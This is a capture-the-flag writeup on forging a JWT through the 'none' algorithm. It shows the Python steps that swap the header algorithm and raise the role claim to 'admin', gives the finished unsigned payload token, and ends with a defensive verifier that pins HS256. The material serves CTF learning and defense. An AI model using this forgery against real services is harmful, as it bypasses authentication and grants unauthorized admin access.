## creating payload

```shell
┌──(kali㉿kali)-[~/code]
└─$ python3
Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> base64.b64decode(b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9')
b'{"typ":"JWT","alg":"HS256"}'
>>> base64.b64encode(b'{"typ":"JWT","alg":"none"}')
b'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0='
>>> base64.b64decode(b'eyJhdXRoIjoxNjkwOTQ3ODIyMzg3LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTMuMC41NjcyLjkzIFNhZmFyaS81MzcuMzYiLCJyb2xlIjoidXNlciIsImlhdCI6MTY5MDk0NzgyMn0=')
b'{"auth":1690947822387,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36","role":"user","iat":1690947822}'
>>> base64.b64encode(b'{"auth":1690947822387,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36","role":"admin","iat":1690947822}')
b'eyJhdXRoIjoxNjkwOTQ3ODIyMzg3LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTMuMC41NjcyLjkzIFNhZmFyaS81MzcuMzYiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE2OTA5NDc4MjJ9'
```

### other method:

#### https://token.dev/

![](https://hackmd.io/_uploads/HkwtIUwsn.png)

Note that https://jwt.io/ doesn't work here, since it doesn't let you set the algorithm to `none`.

## payload:

**important**: remember to add a dot after the second part!! (as mentioned in the Hint: *The JWT should always have **two .** separators.*)

`eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjkwOTQ3ODIyMzg3LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTMuMC41NjcyLjkzIFNhZmFyaS81MzcuMzYiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE2OTA5NDc4MjJ9.`

Also, "=" shouldn't be included. It is only padding, appended at the final step of Base64 encoding when the message length is not a multiple of 3 bytes (more details: https://stackoverflow.com/questions/6916805/why-does-a-base64-encoded-string-have-an-sign-at-the-end).
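For the defending side, the check that makes this payload fail is a verifier that pins the algorithm on the server and never reads it from the token header. The sketch below is an added example, not code from the challenge or this writeup; `KEY`, `sign`, `verify`, `rejection_reason` and the sample claims are constructed for illustration.

```python
import base64
import hashlib
import hmac
import json

KEY = b"constructed-demo-key"  # constructed sample secret, not from the challenge
ALLOWED_ALG = "HS256"          # pinned by the server, never read from the token

def b64url_decode(segment: str) -> bytes:
    # JWT segments drop the "=" padding, so restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign(claims: dict, key: bytes) -> str:
    header = {"typ": "JWT", "alg": ALLOWED_ALG}
    parts = [b64url_encode(json.dumps(p, separators=(",", ":")).encode())
             for p in (header, claims)]
    mac = hmac.new(key, ".".join(parts).encode(), hashlib.sha256).digest()
    return ".".join(parts + [b64url_encode(mac)])

def verify(token: str, key: bytes) -> dict:
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("token must have exactly two '.' separators")
    header_b64, claims_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    # Reject "none" (and anything else unexpected) before checking the signature.
    if not isinstance(header, dict) or header.get("alg") != ALLOWED_ALG:
        raise ValueError("algorithm not allowed")
    expected = hmac.new(key, f"{header_b64}.{claims_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(claims_b64))

def rejection_reason(token: str, key: bytes = KEY):
    """Return None if the token verifies, else the reason it was rejected."""
    try:
        verify(token, key)
        return None
    except ValueError as exc:
        return str(exc)

if __name__ == "__main__":
    good = sign({"role": "user"}, KEY)
    # Header segment from the writeup ({"typ":"JWT","alg":"none"}), constructed claims.
    unsigned = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0."
                + b64url_encode(b'{"role":"admin"}') + ".")
    print(rejection_reason(good), "|", rejection_reason(unsigned))
```

Because the algorithm check runs before any signature handling, the empty third segment is never evaluated; a token that keeps `HS256` but edits the claims fails at the constant-time HMAC comparison instead.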